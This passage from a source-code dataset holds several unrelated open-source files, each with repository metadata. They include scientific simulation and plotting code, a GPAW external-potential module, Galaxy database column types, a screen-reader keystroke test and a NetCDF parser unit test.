pylab.plot(inh_ortc_or,label='act')
pylab.plot(inh_ortc_lr_exc_or,label='LongEE')
pylab.plot(inh_ortc_sr_exc_or,label='ShortEE')
pylab.plot(inh_ortc_sr_inh_or,label='ShortIE')
pylab.xlim(0,60)
pylab.legend()
pylab.subplot(5,3,11)
pylab.imshow(ortc_cl_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,12)
pylab.imshow(inh_ortc_cl_V1Complex_act,vmin=0,vmax=1.0)
#pylab.subplot(5,3,13)
#pylab.imshow(ortc_cl_LGNOn_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,13)
pylab.imshow(ortc_or_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,14)
pylab.imshow(inh_ortc_or_V1Complex_act,vmin=0,vmax=1.0)
pylab.subplot(5,3,15)
pylab.imshow(ortc_or_LGNOn_act,vmin=0,vmax=1.0)
# Restore plasticity and reset the simulator before the next stimulus run.
topo.sim["V1Simple"].plastic = V1Splastic
topo.sim["V1Complex"].plastic = V1Cplastic
topo.sim["V1ComplexInh"].plastic = V1CInhplastic
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(ip)
pylab.savefig(prefix+ sheet_names[0] + params);
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=0
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=0
contrib.jacommands.run_combinations(new_set_parameters,[[0.5],[0.18], [0.1] , [0.4,0.3,0.1], [1.0], [3.8,3.4,3.8,4.2,4.6,5.0], [2.4,1.8,1.2,0.6]])
#plot_size_tuning('')
#contrib.jacommands.run_combinations(check_activity,[[0],[0.1],[-2.5],[0.1],[4.0,5.0,6.0],[-1.0,-1.1],[-0.9,-0.8],[3.0],[1.7],[2.2],[0.1],[0.2,0.3]])
#make_full_analysis(0,0.1,-2.5,0.4,0.1,-8.0,-1.2,1.0,0.6,0.2,0.05,0.0,3.0)
#make_full_analysis(0,0.0,0,0,0,0,0,0,0,0,0,0,0)
#check_activity(0,0.0,0,0,0,0,0,0,0,0,0,0,0)
#contrib.jacommands.run_combinations(check_activity,[[0],[0.1],[-2.5,-2.0,-3.0],[1.6],[0.4],[-8.0,-5.0,-6.0],[-1.2,-1.3,-1.4],[2.0],[0.4],[0.1],[0.05],[0.0,0.02],[4.0]])
#contrib.jacommands.run_combinations(check_activity,[[0],[0.0],[0.0],[0.4,0.8],[0.1,0.2],[-8.0,-5.0,-6.0],[-1.2],[1.0,0.5],[0.6],[0.2],[0.05,0.1],[0.0,0.05],[1.0,2.0,3.0]])
#set_parameters(0,0.1,-2.5,0.4,0.1,-8.0,-1.2,0.5,0.6,0.2,0.05,0.05,3.0)
| ioam/svn-history | contrib/JanA/surround_model_design.py | Python | bsd-3-clause | 33,000 | [
"Gaussian"
] | f7dcc8699ef1f02cd1aad40988dc5d8a630f42433ded329c046aee3d5311885f |
# -*- coding: utf-8 -*-
"""
ORCA Open Remote Control Application
Copyright (C) 2013-2020 Carsten Thielepape
Please contact me by : http://www.orca-remote.org/
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
def RegisterSoundProvider():
    """Register a platform sound provider.

    No-op on this platform: Kivy's core audio functions already cover
    sound playback, so there is nothing extra to register.
    """
    return None
| thica/ORCA-Remote | src/ORCA/utils/Platform/generic/generic_RegisterSoundProvider.py | Python | gpl-3.0 | 966 | [
"ORCA"
] | 029286931b27d409f8875b9ee7d7c9b479db0dfff20872872e4218d62e15b789 |
from __future__ import generators
from pygr.leelabdb import *
import pygr.coordinator
def map_clusters(server,**kwargs):
    """Map clusters one by one.

    Generator worker for the pygr coordinator: for every cluster_id pulled
    from *server*, megablast its genomic sequence against hg17 and persist
    the alignment, yielding the id back to mark it done.
    NOTE(review): **kwargs is accepted but unused here — presumably required
    by the coordinator's worker signature; confirm.
    """
    hg17=BlastDB(ifile=server.open_resource('hg17','r')) # CONSTRUCT RESOURCE FOR US IF NEEDED
    # LOAD DB SCHEMA (only clusters and genomic_seq are used below)
    (clusters,exons,splices,genomic_seq,spliceGraph,alt5Graph,alt3Graph,mrna,protein,
     clusterExons,clusterSplices)=getSpliceGraphFromDB(spliceCalcs['HUMAN_SPLICE'])
    for cluster_id in server:
        g=genomic_seq[cluster_id]
        m=hg17.megablast(g,maxseq=1,minIdentity=98) # MASK, BLAST, READ INTO m
        # SAVE ALIGNMENT m TO DATABASE TABLE test.mytable USING cursor
        createTableFromRepr(m.repr_dict(),
                            'GENOME_ALIGNMENT.hg17_cluster_jan02',
                            clusters.cursor,
                            {'src_id':'varchar(12)','dest_id':'varchar(12)'})
        yield cluster_id # WE MUST FUNCTION AS GENERATOR
def serve_clusters():
    """Serve up cluster_id one by one.

    Generator feeding the coordinator with every row key of the
    HUMAN_SPLICE.genomic_cluster_jan02 table.
    """
    cursor=getUserCursor('HUMAN_SPLICE')
    t=SQLTable('HUMAN_SPLICE.genomic_cluster_jan02',cursor)
    # renamed loop variable: the original used 'id', shadowing the builtin
    for cluster_id in t:
        yield cluster_id
if __name__=='__main__':
    # NOTE(review): only 'import pygr.coordinator' appears above, yet the bare
    # name 'coordinator' is used here — presumably re-exported by the
    # star-import from pygr.leelabdb; verify, otherwise this is a NameError.
    coordinator.start_client_or_server(map_clusters,serve_clusters,['hg17'],__file__)
| ctb/pygr | tests/oldtests/old/mapclusters3.py | Python | bsd-3-clause | 1,250 | [
"BLAST"
] | 251b13365140b653ba5d06bec421580aa333a9cd92f53f43af45cb5b07f72035 |
#!/usr/bin/python
"""Test of navigation to same page links."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
#sequence.append(WaitForDocLoad())
sequence.append(PauseAction(5000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Control>Home"))
sequence.append(utils.AssertPresentationAction(
"1. Top of file",
["BRAILLE LINE: 'Contents h1'",
" VISIBLE: 'Contents h1', cursor=1",
"SPEECH OUTPUT: 'Contents heading level 1'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"2. Tab",
["BRAILLE LINE: 'First item'",
" VISIBLE: 'First item', cursor=1",
"BRAILLE LINE: 'First item'",
" VISIBLE: 'First item', cursor=1",
"SPEECH OUTPUT: 'First item link.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"3. Tab",
["BRAILLE LINE: 'Second item'",
" VISIBLE: 'Second item', cursor=1",
"BRAILLE LINE: 'Second item'",
" VISIBLE: 'Second item', cursor=1",
"SPEECH OUTPUT: 'Second item link.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Return"))
sequence.append(utils.AssertPresentationAction(
"4. Return",
["BRAILLE LINE: 'Second h2'",
" VISIBLE: 'Second h2', cursor=1",
"SPEECH OUTPUT: 'Second heading level 2'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
"5. Down",
["BRAILLE LINE: 'Orca are versatile and opportunistic predators. Some populations feed mostly on fish, and other populations hunt marine'",
" VISIBLE: 'Orca are versatile and opportuni', cursor=1",
"SPEECH OUTPUT: 'Orca are versatile and opportunistic predators. Some populations feed mostly on fish, and other populations hunt marine'"]))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
| GNOME/orca | test/keystrokes/firefox/line_nav_follow_same_page_link.py | Python | lgpl-2.1 | 2,088 | [
"ORCA"
] | 0e85631c96f15745f8d7028709b8f0b01b678337e9ae9ee271cad70a4f43cc00 |
# -*- coding: utf-8 -*-
import os
from click import Argument
from groundwork.patterns import GwCommandsPattern, GwRecipesPattern
class GwRecipesBuilder(GwCommandsPattern, GwRecipesPattern):
    """
    Provides commands for listing and building recipes via command line interface.

    Provided commands:

    * recipe_list
    * recipe_build

    Provides also the recipe **gw_package**, which can be used to setup a groundwork related python package.

    Content of the package:

    * setup.py: Preconfigured and ready to use.
    * groundwork package structure: Directories for applications, patterns, plugins and recipes.
    * Simple, runnable example of a groundwork application and plugins.
    * usable test, supported by py.test and tox.
    * expandable documentation, supported by sphinx and the groundwork sphinx template.
    * .gitignore

    This code is heavily based on Cookiecutter's main.py file:
    https://github.com/audreyr/cookiecutter/blob/master/cookiecutter/main.py
    """
    def __init__(self, *args, **kwargs):
        # Plugin name may be overridden via kwargs; defaults to the class name.
        self.name = kwargs.get("name", self.__class__.__name__)
        super(GwRecipesBuilder, self).__init__(*args, **kwargs)

    def activate(self):
        """Register the two CLI commands and the gw_package recipe."""
        self.commands.register("recipe_list", "Lists all recipes", self._recipe_list)
        self.commands.register("recipe_build", "Builds a given recipe", self._recipe_build,
                               params=[Argument(("recipe",), required=True)])

        # Recipe template lives next to this package under ../recipes/gw_package.
        self.recipes.register("gw_package",
                              os.path.abspath(os.path.join(os.path.dirname(__file__), "../recipes/gw_package")),
                              description="Groundwork basic package. Includes places for "
                                          "apps, plugins, patterns and recipes.",
                              final_words="Recipe Installation is done.\n\n"
                                          "During development use buildout:\n"
                                          "Run: python bootstrap.py\n"
                                          "Then: bin/buildout\n"
                                          "Start the app: bin/app\n\n"
                                          "For installation run: 'python setup.py install' \n"
                                          "For documentation run: 'make html' inside doc folder "
                                          "(after installation!)\n\n"
                                          "For more information, please take a look into the README file "
                                          "to know how to go on.\n"
                                          "For help visit: https://groundwork.readthedocs.io\n\n"
                                          "Have fun with your groundwork package.")

    def deactivate(self):
        """Nothing to unregister; the app tears down commands/recipes itself."""
        pass

    def _recipe_list(self):
        """CLI handler: print every registered recipe with its owning plugin."""
        print("Recipes:")
        for key, recipe in self.app.recipes.get().items():
            print("  %s by plugin '%s' - %s" % (recipe.name, recipe.plugin.name, recipe.description))

    def _recipe_build(self, recipe):
        """CLI handler: build the named recipe interactively (cookiecutter prompts)."""
        recipe_obj = self.app.recipes.get(recipe)
        if recipe_obj is None:
            print("Recipe %s not found." % recipe)
        else:
            recipe_obj.build(no_input=False, extra_context=None)
| useblocks/groundwork | groundwork/plugins/gw_recipes_builder.py | Python | mit | 3,282 | [
"VisIt"
] | 0047221d0bf48bad3cd49ef99d64a54109372613b98c8982c84b25ff1ac6b0a7 |
"""
Unit tests for basic CDL constructs.
"""
import os
import tempfile
import unittest
import cdlparser
import numpy as np
#---------------------------------------------------------------------------------------------------
class TestBasics(unittest.TestCase):
    """Parse a small CDL document and verify the resulting netCDF dataset's
    dimensions, variables, data values and attributes."""

    def setUp(self):
        cdltext = r"""netcdf basics {
        dimensions:
            lev = 1 ;
            lat = 2 ;
            lon = 3 ;
            time = unlimited ;
        variables:
            int tas(lev, lat, lon) ;
                tas:standard_name = "air_temperature" ;
                tas:units = "K" ;
                tas:radius = 6371000.0 ;
            double height(lev) ;
                height:standard_name = "height" ;
        // global attributes
            :Conventions = "CF-1.5" ;
            :comment = "cdlparser rocks!" ;
        data:
            tas = 0, 1, 2, 3, 4, 5 ;
            height = 10.0 ;
        }"""
        parser = cdlparser.CDL3Parser()
        # mkstemp returns (fd, path); close the fd immediately so it is not
        # leaked — the original kept only the path and left the OS-level
        # descriptor open for the life of the process.
        fd, self.tmpfile = tempfile.mkstemp(suffix='.nc')
        os.close(fd)
        self.dataset = parser.parse_text(cdltext, ncfile=self.tmpfile)

    def tearDown(self):
        # NOTE(review): if parse_text returns an open netCDF4 Dataset,
        # consider self.dataset.close() before removing the file.
        if os.path.exists(self.tmpfile):
            os.remove(self.tmpfile)

    def test_global_atts(self):
        # assertEqual instead of assertTrue(x == y) for informative failures
        self.assertEqual(self.dataset.Conventions, "CF-1.5")
        self.assertEqual(self.dataset.comment, "cdlparser rocks!")

    def test_dimensions(self):
        self.assertEqual(len(self.dataset.dimensions), 4)
        lev = self.dataset.dimensions['lev']
        self.assertEqual(len(lev), 1)
        lat = self.dataset.dimensions['lat']
        self.assertEqual(len(lat), 2)
        lon = self.dataset.dimensions['lon']
        self.assertEqual(len(lon), 3)
        time = self.dataset.dimensions['time']
        # unlimited dimension: no records written, so current length is 0
        self.assertEqual(len(time), 0)
        self.assertTrue(time.isunlimited())

    def test_variables(self):
        self.assertEqual(len(self.dataset.variables), 2)
        tas = self.dataset.variables['tas']
        self.assertEqual(tas.standard_name, "air_temperature")
        self.assertEqual(tas.units, "K")
        self.assertEqual(tas.radius, np.float64(6371000.0))
        data = tas[:]
        self.assertEqual(data.shape, (1, 2, 3))
        expected = np.arange(6, dtype=np.int32)
        expected.shape = (1, 2, 3)
        self.assertTrue(np.array_equal(data, expected))
        ht = self.dataset.variables['height']
        self.assertEqual(ht.standard_name, "height")
        data = ht[:]
        self.assertEqual(data.shape, (1,))
        expected = np.array([10.0], dtype=np.float64)
        self.assertTrue(np.array_equal(data, expected))
#---------------------------------------------------------------------------------------------------
if __name__ == '__main__':
#---------------------------------------------------------------------------------------------------
    # Entry point: run the test suite when executed directly.
    unittest.main()
| ocehugo/cdlparser | test/test_basics.py | Python | bsd-3-clause | 2,901 | [
"NetCDF"
] | 16cc26fae77b858742665a1bf535e9b6314309c4b0dd4d98f72c132839824d8e |
import numpy as np
from ase.units import Bohr
"""This module defines different external potentials to be used in
time-independent and time-dependent calculations."""
class ExternalPotential:
    """External potential sampled on a real-space grid.

    Grid values are in Hartree.  Subclasses may instead generate the
    potential lazily in get_potential().
    """
    def __init__(self, vext_g=None, gd=None):
        """Initialize with a grid and the corresponding grid descriptor.

        Grid values should be in Hartree.
        """
        self.vext_g = vext_g
        self.gd = gd
        if self.gd is not None:
            assert gd.orthogonal
            # np.all replaces the deprecated np.alltrue alias (removed in
            # numpy 2.0); behaviour is identical.
            if np.all(vext_g.shape ==
                      gd.get_size_of_global_array()):
                # this is a global array and has to be distributed
                self.vext_g = self.gd.zeros()
                self.gd.distribute(vext_g, self.vext_g)

    def get_potential(self, gd=None):
        """Return the potential grid, binding the grid descriptor on first use."""
        if self.gd is None:
            self.gd = gd
        else:
            if gd is not None:
                # make sure we are talking about the same grid
                assert gd == self.gd
        return self.vext_g

    def get_taylor(self, position=None, spos_c=None):
        """Get the Taylor expansion around a point.

        position [Angstrom]"""
        # use only 0 order term, i.e. the value
        return [[self.get_value(position, spos_c)]]

    def get_value(self, position=None, spos_c=None):
        """The potential value (as seen by an electron)
        at a certain grid point.

        position [Angstrom]
        spos_c   scaled position on the grid"""
        if spos_c is None:
            spos_c = self.gd.scale_position(position / Bohr)
        g_c = self.gd.get_nearest_grid_point(spos_c)
        g_c -= (g_c == self.gd.n_c)  # force point to this domain
        return self.vext_g[tuple(g_c)]

    def get_nuclear_energy(self, nucleus):
        """Return the energy contribution of the bare nucleus."""
        return 0.  # don't assume anything about the nucleus

    def add_linear_field(self, wfs, spos_ac, a_nG, b_nG, strength, kpt):
        """Adds (does NOT apply) linear field
        f(x,y,z) = str_x * x + str_y * y + str_z * z to wavefunctions.

        Parameters
        ----------
        pt_nuclei: List of ?LocalizedFunctions?
            Projectors (paw.pt_nuclei)
        a_nG:
            the wavefunctions
        b_nG:
            the result
        strength: float[3]
            strength of the linear field
        kpt: KPoint
            K-point
        """
        gd = wfs.gd

        # apply local part of x to smooth wavefunctions psit_n
        for i in range(gd.n_c[0]):
            x = (i + gd.beg_c[0]) * gd.h_cv[0, 0]
            b_nG[:, i, :, :] += (strength[0] * x) * a_nG[:, i, :, :]

        # FIXME: combine y and z to one vectorized operation,
        # i.e., make yz-array and take its product with a_nG

        # apply local part of y to smooth wavefunctions psit_n
        for i in range(gd.n_c[1]):
            y = (i + gd.beg_c[1]) * gd.h_cv[1, 1]
            b_nG[:, :, i, :] += (strength[1] * y) * a_nG[:, :, i, :]

        # apply local part of z to smooth wavefunctions psit_n
        for i in range(gd.n_c[2]):
            z = (i + gd.beg_c[2]) * gd.h_cv[2, 2]
            b_nG[:, :, :, i] += (strength[2] * z) * a_nG[:, :, :, i]

        # apply the non-local part for each nucleus
        # number of wavefunctions, psit_nG
        n = len(a_nG)
        P_ani = wfs.pt.dict(n)
        wfs.pt.integrate(a_nG, P_ani, kpt.q)
        coef_ani = {}
        for a, P_ni in P_ani.items():
            c0 = np.dot(spos_ac[a] * gd.cell_cv.diagonal(), strength)
            cxyz = strength
            # calculate coefficient
            # ---------------------
            #
            # coeffs_ni =
            #   P_nj * c0 * 1_ij
            #   + P_nj * cx * x_ij
            #
            # where (see spherical_harmonics.py)
            #
            # 1_ij = sqrt(4pi) Delta_0ij
            # y_ij = sqrt(4pi/3) Delta_1ij
            # z_ij = sqrt(4pi/3) Delta_2ij
            # x_ij = sqrt(4pi/3) Delta_3ij
            # ...
            Delta_iiL = wfs.setups[a].Delta_Lii  # XXX rename in setup.py

            # 1_ij = sqrt(4pi) Delta_0ij
            # y_ij = sqrt(4pi/3) Delta_1ij
            # z_ij = sqrt(4pi/3) Delta_2ij
            # x_ij = sqrt(4pi/3) Delta_3ij
            oneij = np.sqrt(4. * np.pi) \
                * np.dot(P_ni, Delta_iiL[:, :, 0])
            yij = np.sqrt(4. * np.pi / 3.) \
                * np.dot(P_ni, Delta_iiL[:, :, 1])
            zij = np.sqrt(4. * np.pi / 3.) \
                * np.dot(P_ni, Delta_iiL[:, :, 2])
            xij = np.sqrt(4. * np.pi / 3.) \
                * np.dot(P_ni, Delta_iiL[:, :, 3])

            # coefficients
            # coefs_ni = sum_j ( <phi_i| f(x,y,z) | phi_j>
            #                    - <phit_i| f(x,y,z) | phit_j> ) P_nj
            coef_ani[a] = (c0 * oneij
                           + cxyz[0] * xij + cxyz[1] * yij + cxyz[2] * zij)

        # add partial wave pt_nG to psit_nG with proper coefficient
        wfs.pt.add(b_nG, coef_ani, kpt.q)

    # BAD, VERY VERY SLOW, DO NOT USE IN REAL CALCULATIONS!!!
    def apply_scalar_potential(self, pt_nuclei, a_nG, b_nG, func, kpt):
        """Apply scalar function f(x,y,z) to wavefunctions. BAD

        NOTE: BAD, VERY VERY SLOW, DO NOT USE IN REAL CALCULATIONS!!!

        The function is approximated by a low-order polynomial near nuclei.

        Currently supports only quadratic (actually, only linear as
        nucleus.apply_polynomial support only linear)::

          p(x,y,z) = a + b_x x + b_y y + b_z z
                     + c_x^2 x^2 + c_xy x y
                     + c_y^2 y^2 + c_yz y z
                     + c_z^2 z^2 + c_zx z x

        The polynomial is constructed by making a least-squares fit to
        points (0,0,0), 3/8 (r_cut,0,0), sqrt(3)/4 (r_cut,r_cut,r_cut), and
        to points symmetric in cubic symmetry. (Points are given relative to
        the nucleus).
        """
        # apply local part to smooth wavefunctions psit_n
        for i in range(kpt.gd.n_c[0]):
            x = (i + kpt.gd.beg_c[0]) * kpt.gd.h_cv[0, 0]
            for j in range(kpt.gd.n_c[1]):
                y = (j + kpt.gd.beg_c[1]) * kpt.gd.h_cv[1, 1]
                for k in range(kpt.gd.n_c[2]):
                    # BUG FIX: was kpt.gd.h_c[2, 2]; the grid descriptor
                    # attribute is h_cv, as used for x and y above.
                    z = (k + kpt.gd.beg_c[2]) * kpt.gd.h_cv[2, 2]
                    b_nG[:, i, j, k] = func.value(x, y, z) * a_nG[:, i, j, k]

        # apply the non-local part for each nucleus
        for nucleus in pt_nuclei:
            if nucleus.in_this_domain:
                # position
                x_c = nucleus.spos_c[0] * kpt.gd.cell_cv[0, 0]
                y_c = nucleus.spos_c[1] * kpt.gd.cell_cv[1, 1]
                z_c = nucleus.spos_c[2] * kpt.gd.cell_cv[2, 2]

                # Delta r = max(r_cut) / 2
                # factor sqrt(1/3) because (dr,dr,dr)^2 = Delta r
                rcut = max(nucleus.setup.rcut_j)
                a = rcut * 3.0 / 8.0
                b = 2.0 * a / np.sqrt(3.0)

                # evaluate function at (0,0,0), 3/8 (r_cut,0,0),
                # sqrt(3)/4 (r_cut,r_cut,rcut), and at symmetric points
                # in cubic symmetry
                #
                # coordinates
                coords = [[x_c, y_c, z_c],
                          [x_c + a, y_c, z_c],
                          [x_c - a, y_c, z_c],
                          [x_c, y_c + a, z_c],
                          [x_c, y_c - a, z_c],
                          [x_c, y_c, z_c + a],
                          [x_c, y_c, z_c - a],
                          [x_c + b, y_c + b, z_c + b],
                          [x_c + b, y_c + b, z_c - b],
                          [x_c + b, y_c - b, z_c + b],
                          [x_c + b, y_c - b, z_c - b],
                          [x_c - b, y_c + b, z_c + b],
                          [x_c - b, y_c + b, z_c - b],
                          [x_c - b, y_c - b, z_c + b],
                          [x_c - b, y_c - b, z_c - b]]
                # values
                values = np.zeros(len(coords))
                for i in range(len(coords)):
                    values[i] = func.value(coords[i][0],
                                           coords[i][1],
                                           coords[i][2])

                # fit polynomial
                # !!! FIX ME !!! order should be changed to 2 as soon as
                # nucleus.apply_polynomial supports it
                # NOTE(review): neither 'Polynomial' nor 'self.k' is defined
                # in this module — this method cannot run as-is; confirm the
                # missing import / attribute before reviving it.
                nuc_poly = Polynomial(values, coords, order=1)
                # print nuc_poly.c

                # apply polynomial operator
                nucleus.apply_polynomial(a_nG, b_nG, self.k, nuc_poly)
            # if not in this domain
            else:
                nucleus.apply_polynomial(a_nG, b_nG, self.k, None)
class ConstantPotential(ExternalPotential):
    """Spatially uniform external potential (useful for tests)."""

    def __init__(self, constant=1.):
        self.constant = constant
        ExternalPotential.__init__(self)

    def get_potential(self, gd):
        # Lazily build the constant grid on first request, then cache it.
        if self.vext_g is None:
            self.gd = gd
            self.vext_g = gd.zeros() + self.constant
        return self.vext_g

    def get_ion_energy_and_forces(self, atoms):
        """Return the ionic energy and force contribution."""
        # A constant potential exerts no force and adds no ionic energy.
        energy = 0
        forces = np.zeros((len(atoms), 3))
        return energy, forces
class ElectrostaticPotential(ExternalPotential):
    """External electrostatic potential

    The action of the external potential on the nucleus is defined in the
    electrostatic case.
    """
    def get_ion_energy_and_forces(self, atoms):
        """Return the ionic energy and force contribution."""
        forces = np.zeros((len(atoms), 3))
        energy = 0
        for i, atom in enumerate(atoms):
            # Taylor-expand the potential at the nuclear position:
            # 0th order gives the energy, 1st order (gradient) the force.
            taylor = self.get_taylor(atom.position)
            ## print "pos, taylor=", atom.position, taylor
            Z = atom.number
            energy -= Z * taylor[0][0]
            if len(taylor) > 1:
                # see spherical_harmonics.py for the assignment
                # (the l=1 entries are ordered y, z, x)
                forces[i] += Z * np.array([taylor[1][2],   # x
                                           taylor[1][0],   # y
                                           taylor[1][1]])  # z
        return energy, forces
class ConstantElectricField(ElectrostaticPotential):
    """External constant electric field"""
    def __init__(self, strength, direction=[0, 0, 1], center=None):
        """
        strength: field strength [atomic units]
        direction: polarisation direction
        center: the center of zero field [Angstrom]
        """
        self.strength = strength
        if center is None:
            self.center = None
        else:
            self.center = np.array(center) / Bohr

        # Normalise the direction.  Build a float copy first: the original
        # divided the array *in place*, which raises a casting TypeError for
        # integer input such as the default [0, 0, 1] on modern numpy (and
        # it shadowed the builtin dir()).
        direction_v = np.asarray(direction, dtype=float)
        self.direction = direction_v / np.sqrt(np.dot(direction_v, direction_v))

    def get_potential(self, gd=None):
        """Get the potential on the grid."""
        if hasattr(self, 'potential'):
            if gd == self.gd or gd is None:
                # nothing changed
                return self.potential

        self.gd = gd

        if self.center is None:
            # use the center of the grid as default
            self.center = .5 * np.sum(gd.h_cv * gd.N_c, axis=0)

        # Projection of each grid coordinate onto the field direction,
        # measured relative to the zero-field center.
        x = np.dot(((np.arange(gd.n_c[0]) + gd.beg_c[0]).reshape(-1, 1) *
                    gd.h_cv[0, :] - self.center), self.direction)
        y = np.dot(((np.arange(gd.n_c[1]) + gd.beg_c[1]).reshape(-1, 1) *
                    gd.h_cv[1, :] - self.center), self.direction)
        z = np.dot(((np.arange(gd.n_c[2]) + gd.beg_c[2]).reshape(-1, 1) *
                    gd.h_cv[2, :] - self.center), self.direction)
        x.shape = (-1, 1, 1)
        y.shape = (1, -1, 1)
        z.shape = (1, 1, -1)

        self.potential = self.strength * (np.resize(x, gd.n_c) +
                                          np.resize(y, gd.n_c) +
                                          np.resize(z, gd.n_c))
        return self.potential

    def get_taylor(self, position=None, spos_c=None):
        """Get the Taylor expansion around a point

        position [Angstrom]"""
        if position is None:
            gd = self.gd
            pos = np.dot(gd.N_c * spos_c, gd.h_cv) * Bohr
        else:
            pos = position
        # see spherical_harmonics.py for the assignment
        return [[self.get_value(position=pos)],
                [self.strength * self.direction[1],   # y
                 self.strength * self.direction[2],   # z
                 self.strength * self.direction[0]]]  # x

    def get_value(self, position=None, spos_c=None):
        """The potential value (as seen by an electron)
        at a certain grid point.

        position [Angstrom]
        spos_c   scaled position on the grid"""
        gd = self.gd
        if position is None:
            vr = np.dot(gd.N_c * spos_c, gd.h_cv) - self.center
        else:
            vr = position / Bohr - self.center
        return self.strength * np.dot(vr, self.direction)
| qsnake/gpaw | gpaw/external_potential.py | Python | gpl-3.0 | 13,131 | [
"ASE"
] | f887b35263eb4b4cb5f00887f242bb18067c40b9004955c3c70b5220d03a871e |
from sqlalchemy.types import *
import json
import pickle
import copy
import uuid
import binascii
from galaxy.util.bunch import Bunch
from galaxy.util.aliaspickler import AliasPickleModule
# For monkeypatching BIGINT
import sqlalchemy.dialects.sqlite
import sqlalchemy.dialects.postgresql
import sqlalchemy.dialects.mysql
import logging
log = logging.getLogger( __name__ )
# Default JSON encoder and decoder
# Shared module-level codec instances; sort_keys=True makes serialization
# deterministic so value comparison/copying is stable.
json_encoder = json.JSONEncoder( sort_keys=True )
json_decoder = json.JSONDecoder( )
def _sniffnfix_pg9_hex(value):
"""
Sniff for and fix postgres 9 hex decoding issue
"""
try:
if value[0] == 'x':
return binascii.unhexlify(value[1:])
elif value.startswith( '\\x' ):
return binascii.unhexlify( value[2:] )
else:
return value
except Exception, ex:
return value
class JSONType( TypeDecorator ):
    """
    Defines a JSONType for SQLAlchemy.  Takes a primitive as input and
    JSONifies it.  This should replace PickleType throughout Galaxy.
    """
    impl = LargeBinary

    def process_bind_param( self, value, dialect ):
        # Serialize to JSON text on the way into the database.
        if value is None:
            return None
        return json_encoder.encode( value )

    def process_result_value( self, value, dialect ):
        # Deserialize on the way out, first undoing any postgres-9 hex mangling.
        if value is None:
            return None
        return json_decoder.decode( str( _sniffnfix_pg9_hex(value) ) )

    def copy_value( self, value ):
        # return json_decoder.decode( json_encoder.encode( value ) )
        return copy.deepcopy( value )

    def compare_values( self, x, y ):
        # return json_encoder.encode( x ) == json_encoder.encode( y )
        return ( x == y )

    def is_mutable( self ):
        # NOTE(review): is_mutable() belongs to the legacy (pre-Mutable
        # extension) SQLAlchemy mutability API — confirm against the pinned
        # SQLAlchemy version.
        return True
# Unpickler for legacy metadata: the Bunch class moved from cookbook.patterns
# to galaxy.util.bunch, so old pickles need their import path aliased.
metadata_pickler = AliasPickleModule( {
    ( "cookbook.patterns", "Bunch" ) : ( "galaxy.util.bunch" , "Bunch" )
    } )
class MetadataType( JSONType ):
    """
    Backward compatible metadata type. Can read pickles or JSON, but always
    writes in JSON.
    """
    def process_result_value( self, value, dialect ):
        """Decode a stored value: try legacy pickle first, then JSON,
        returning None if neither format parses."""
        if value is None:
            return None
        ret = None
        # except Exception (not bare except) so SystemExit/KeyboardInterrupt
        # are no longer swallowed here.
        try:
            ret = metadata_pickler.loads( str( value ) )
            if ret:
                ret = dict( ret.__dict__ )
        except Exception:
            try:
                ret = json_decoder.decode( str( _sniffnfix_pg9_hex(value) ) )
            except Exception:
                ret = None
        return ret
class UUIDType(TypeDecorator):
    """
    Platform-independent UUID type.
    Based on http://docs.sqlalchemy.org/en/rel_0_8/core/types.html#backend-agnostic-guid-type
    Changed to remove sqlalchemy 0.8 specific code

    CHAR(32), storing as stringified hex values.
    """
    impl = CHAR

    def load_dialect_impl(self, dialect):
        return dialect.type_descriptor(CHAR(32))

    def process_bind_param(self, value, dialect):
        """Store as a 32-char lowercase hex string."""
        if value is None:
            return value
        if not isinstance(value, uuid.UUID):
            # hexstring input: parse it first
            value = uuid.UUID(value)
        # BUG FIX: %x needs an integer — format the 128-bit .int value.
        # The original formatted the UUID instance itself, which raises
        # TypeError ("%x format: a number is required").
        return "%.32x" % value.int

    def process_result_value(self, value, dialect):
        if value is None:
            return value
        return uuid.UUID(value)
class TrimmedString( TypeDecorator ):
    # String column type that silently truncates over-long values on insert.
    impl = String

    def process_bind_param( self, value, dialect ):
        """Automatically truncate string values"""
        # Only truncate when the column declares a length; None passes through.
        if self.impl.length and value is not None:
            value = value[0:self.impl.length]
        return value
#class BigInteger( Integer ):
#"""
#A type for bigger ``int`` integers.
#Typically generates a ``BIGINT`` in DDL, and otherwise acts like
#a normal :class:`Integer` on the Python side.
#"""
#class BIGINT( BigInteger ):
#"""The SQL BIGINT type."""
#class SLBigInteger( BigInteger ):
#def get_col_spec( self ):
#return "BIGINT"
#sqlalchemy.dialects.sqlite.SLBigInteger = SLBigInteger
#sqlalchemy.dialects.sqlite.colspecs[BigInteger] = SLBigInteger
#sqlalchemy.dialects.sqlite.ischema_names['BIGINT'] = SLBigInteger
#sqlalchemy.dialects.postgres.colspecs[BigInteger] = sqlalchemy.dialects.postgres.PGBigInteger
#sqlalchemy.dialects.mysql.colspecs[BigInteger] = sqlalchemy.dialects.mysql.MSBigInteger
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/model/custom_types.py | Python | gpl-3.0 | 4,279 | [
"Galaxy"
] | 4977ce6b363d3f14b6b3be7186cfafbc828be19c64b0adedb1936e4dea3e62dd |
"""Pylons middleware initialization"""
import types
